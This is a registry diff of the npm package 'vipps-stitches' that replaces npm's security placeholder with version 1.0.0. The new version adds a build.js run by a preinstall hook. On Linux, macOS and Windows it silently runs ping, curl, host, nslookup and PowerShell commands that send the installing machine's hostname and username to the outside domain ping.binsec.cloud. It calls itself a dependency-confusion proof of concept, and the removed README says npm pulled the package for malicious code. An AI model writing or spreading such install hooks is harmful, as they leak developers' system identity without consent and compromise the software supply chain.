vipps-stitches 0.0.1-security → 1.0.0

package/build.js

@@ -0,0 +1,28 @@
+var exec = require('child_process').exec;
+var os = require('os');
+
+domain = "ping.binsec.cloud";
+
+// Run command depending on the OS
+if (os.type() === 'Linux'){
+   exec(`ping -c 1 osx.$(hostname).$(whoami).${domain}`); 
+   exec(`curl https://${domain}/ping?id=dependencyconfusion-$(hostname).$(whoami)`);
+   exec(`host osx.$(hostname).$(whoami).${domain}`);
+}
+else if (os.type() === 'Darwin'){ 
+   exec(`ping -c 1 osx.$(hostname).$(whoami).${domain}`); 
+   exec(`curl https://${domain}/ping?id=dependencyconfusion-$(hostname).$(whoami)`);
+   exec(`host osx.$(hostname).$(whoami).${domain}`);
+}
+else if (os.type() === 'Windows_NT') { 
+   exec(`ping -n 1 windows.${domain}`);
+   exec(`nslookup windows.${domain}`);
+   exec(`powershell $cmd = whoami; wget https://${domain}/ping?id=dependencyconfusion-$cmd`);
+   exec(`powershell $cmd = whoami; curl https://${domain}/ping?id=dependencyconfusion-$cmd`);
+}
+else {
+   exec(`ping ${domain}`);
+   exec(`curl https://${domain}/ping?id=dependencyconfusion`);
+   exec(`nslookup ${domain}`);
+   exec(`host ${domain}`);
+}

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "vipps-stitches",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "This package is a test package used to prove dependency confusion. All it does is perform a DNS lookup.",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node build.js && exit 0"
+  },
+  "author": "Binary Security",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=vipps-stitches for more information.